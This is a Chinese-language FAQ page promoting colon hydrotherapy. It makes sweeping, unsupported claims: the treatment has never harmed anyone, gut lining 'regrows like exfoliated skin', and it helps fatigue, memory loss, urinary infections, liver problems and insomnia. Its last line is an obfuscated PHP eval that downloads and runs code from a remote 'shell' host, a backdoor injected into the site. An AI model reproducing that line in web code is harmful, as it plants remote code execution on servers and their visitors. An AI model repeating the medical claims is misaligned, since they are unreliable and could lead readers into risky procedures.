收藏本站
大腸水療Q&A 列印 E-mail
以下我們用問答的方式來進一步說明大腸水療:

問:做大腸水療會痛嗎?
答:水療的儀器擁有專利,並經美國FDA(衛生總署)檢驗合格。本療法在歐美醫療院所已實際操作超過二十年,尚未有任何一人在專業醫療單位因本療法發生過任何傷害。大部分的人並不感覺到痛,最多是有拉肚子時的感覺而已。

問:一般健康的人需要做大腸水療嗎?
答:美國腸胃外科醫師Dr.Lwonard Smith極力提倡大腸水療,他說一般健康的人來做大腸水療是基於預防,但是會對所排出那麼多的廢物感到驚奇。

問:做大腸水療腸子會不會被水壓撐破?
答:人體大腸所承受的壓力約在五磅左右,而水療機器都維持在一點四五磅以下,超過此壓力,機器就會暫停供水,所以不可能將腸子洗破;除非本身有大腸息肉炎或腫瘤破裂的情形,所以需專業醫療人員評估與施作。

問:做大腸水療是否會產生依賴性?
答:水是人體大腸代謝功能中最佳的清潔兼潤滑劑,可使大便滑潤容易排出,大腸水療使用溫水且不添加任何藥物,利用溫水軟化糞便,溫和地刺激腸子蠕動,喚起腸子原本的功能,而不是透過藥物刺激,所以不會有依賴性。

問:應該多久做一次大腸水療?
答:大腸水療分為三階段:清除期、重建期、保養期。清除期時,一周約二到三次,將大量積存以久的宿便清除,之後依照個人的飲食習慣、排便情形,醫師會做個別性的評估與建議。

問:腸內的黏膜和好菌是否會被洗掉?
答:其實每當我們排泄時,黏膜也都會被排泄出來,洗腸和臉去角質一樣會再生,所以不必擔心!再加服高單位的有益菌,可以幫助重健新的腸內菌叢生態,更能增強腸胃功能。

問:肛門洗久是否會鬆弛?
答:肛門有擴約肌,在管子那麼小的擴張力下,不可能將肛門撐大的。一般而言,只有產婦、年紀大、經常性肛交的人肛門才會鬆弛,不可能因洗水療而撐大。

問:什麼人您會建議他做大腸水療呢?
答:有疲勞、煩躁、記憶減退、口臭、手腳冰冷、泌尿道感染、肝功能異常、皮膚暗沈、頭痛、腸胃脹氣、失眠、體重過重、大便氣味惡臭、不明原因酸痛、便秘、免疫功能下降……等症狀的人,我都會建議他們做大腸水療來幫助改善症狀。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));